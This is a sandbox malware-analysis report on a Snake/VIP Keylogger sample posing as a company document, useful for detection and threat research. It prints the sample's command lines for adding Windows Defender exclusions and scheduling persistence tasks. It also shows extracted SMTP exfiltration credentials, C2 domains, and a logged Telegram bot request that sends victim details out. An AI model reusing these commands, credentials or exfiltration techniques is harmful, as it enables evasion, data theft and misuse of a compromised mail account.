Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Overview

General Information

Sample name:Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Analysis ID:1501092
MD5:b2fcde172f7605e8a4af7b60349418d7
SHA1:7279c465e2ea6ced62c742c679db21ec9a9a4514
SHA256:8fcc14a7d1f657fd1cf84282ad1d81404e7ccc253e9ad8f36ccd9118a674d6cc
Tags:exeSnakeKeylogger
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Autofill Manufacturing Sdn Bhd 28-08-2024.exe (PID: 7968 cmdline: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe" MD5: B2FCDE172F7605E8A4AF7B60349418D7)
    • powershell.exe (PID: 8140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2712 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7476 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • GhrKoSGuCdvpJ.exe (PID: 7032 cmdline: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe MD5: B2FCDE172F7605E8A4AF7B60349418D7)
    • schtasks.exe (PID: 7712 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • GhrKoSGuCdvpJ.exe (PID: 4268 cmdline: "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe" MD5: B2FCDE172F7605E8A4AF7B60349418D7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "Oqc9k0@9", "Password": "mail.laime.it", "Host": "clone@glamourstorepa.com.br", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "info@laime.it", "Password": "Oqc9k0@9", "Host": "mail.laime.it", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 14 entries
            SourceRuleDescriptionAuthorStrings
            11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
                  • 0x2de59:$s1: UnHook
                  • 0x2de60:$s2: SetHook
                  • 0x2de68:$s3: CallNextHook
                  • 0x2de75:$s4: _hook
                  0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 23 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ParentImage: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ParentProcessId: 7968, ParentProcessName: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ProcessId: 8140, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ParentImage: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ParentProcessId: 7968, ParentProcessName: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ProcessId: 8140, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe, ParentImage: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe, ParentProcessId: 7032, ParentProcessName: GhrKoSGuCdvpJ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp", ProcessId: 7712, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ParentImage: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ParentProcessId: 7968, ParentProcessName: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", ProcessId: 7476, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ParentImage: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ParentProcessId: 7968, ParentProcessName: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ProcessId: 8140, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ParentImage: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ParentProcessId: 7968, ParentProcessName: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", ProcessId: 7476, ProcessName: schtasks.exe
                    Timestamp:2024-08-29T12:16:25.120780+0200
                    SID:2803274
                    Severity:2
                    Source Port:49711
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-08-29T12:16:22.828528+0200
                    SID:2803274
                    Severity:2
                    Source Port:49711
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-08-29T12:16:28.698912+0200
                    SID:2803274
                    Severity:2
                    Source Port:49723
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-08-29T12:16:18.292635+0200
                    SID:2803274
                    Severity:2
                    Source Port:49706
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-08-29T12:16:27.215975+0200
                    SID:2803305
                    Severity:3
                    Source Port:49721
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T12:16:24.148322+0200
                    SID:2803305
                    Severity:3
                    Source Port:49715
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T12:16:29.337371+0200
                    SID:2803305
                    Severity:3
                    Source Port:49725
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T12:16:29.465790+0200
                    SID:2803305
                    Severity:3
                    Source Port:49726
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T12:16:24.261401+0200
                    SID:2803274
                    Severity:2
                    Source Port:49711
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-08-29T12:16:25.685896+0200
                    SID:2803305
                    Severity:3
                    Source Port:49718
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T12:16:21.455030+0200
                    SID:2803274
                    Severity:2
                    Source Port:49712
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-08-29T12:16:18.741649+0200
                    SID:2803305
                    Severity:3
                    Source Port:49710
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T12:16:26.386413+0200
                    SID:2803274
                    Severity:2
                    Source Port:49719
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-08-29T12:16:16.777161+0200
                    SID:2803274
                    Severity:2
                    Source Port:49706
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-08-29T12:16:30.721477+0200
                    SID:2803305
                    Severity:3
                    Source Port:49730
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-08-29T12:16:27.195934+0200
                    SID:2803305
                    Severity:3
                    Source Port:49720
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                    Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                    Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@laime.it", "Password": "Oqc9k0@9", "Host": "mail.laime.it", "Port": "587", "Version": "4.4"}
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "Oqc9k0@9", "Password": "mail.laime.it", "Host": "clone@glamourstorepa.com.br", "Port": "587", "Version": "4.4"}
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeVirustotal: Detection: 60%Perma Link
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeVirustotal: Detection: 60%Perma Link
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeReversingLabs: Detection: 57%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeJoe Sandbox ML: detected
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49707 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49717 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49746 version: TLS 1.2
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 010AF45Dh11_2_010AF2C0
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 010AF45Dh11_2_010AF4AC
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 010AFC19h11_2_010AF961
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 0692E0A9h11_2_0692DE00
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 069231E0h11_2_06922DC8
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 06920D0Dh11_2_06920B30
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 06921697h11_2_06920B30
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 06922C19h11_2_06922968
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 0692E959h11_2_0692E6B0
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06920673
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 0692F209h11_2_0692EF60
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 0692CF49h11_2_0692CCA0
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 069231E0h11_2_06922DC3
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 0692D7F9h11_2_0692D550
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 0692E501h11_2_0692E258
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 0692F661h11_2_0692F3B8
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 0692EDB1h11_2_0692EB08
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 0692D3A1h11_2_0692D0F8
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 0692FAB9h11_2_0692F810
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06920853
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06920040
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 0692DC51h11_2_0692D9A8
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 4x nop then jmp 069231E0h11_2_0692310E
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 056BF2EDh20_2_056BF150
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 056BF2EDh20_2_056BF33C
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 056BFAA9h20_2_056BF804
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 07030D0Dh20_2_07030B30
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 07031697h20_2_07030B30
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 07032C21h20_2_07032970
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 070331E8h20_2_07032DD0
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 0703D1B1h20_2_0703CF08
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 0703D609h20_2_0703D360
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 0703DA61h20_2_0703D7B8
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 0703F8C9h20_2_0703F620
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_07030673
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 0703FD21h20_2_0703FA78
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 070331E8h20_2_07033116
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 0703EBC1h20_2_0703E918
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 0703F019h20_2_0703ED70
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 070331E8h20_2_07032DCA
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 0703F471h20_2_0703F1C8
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 0703DEB9h20_2_0703DC10
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_07030040
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_07030853
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 0703E311h20_2_0703E068
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 4x nop then jmp 0703E769h20_2_0703E4C0

                    Networking

                    barindex
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
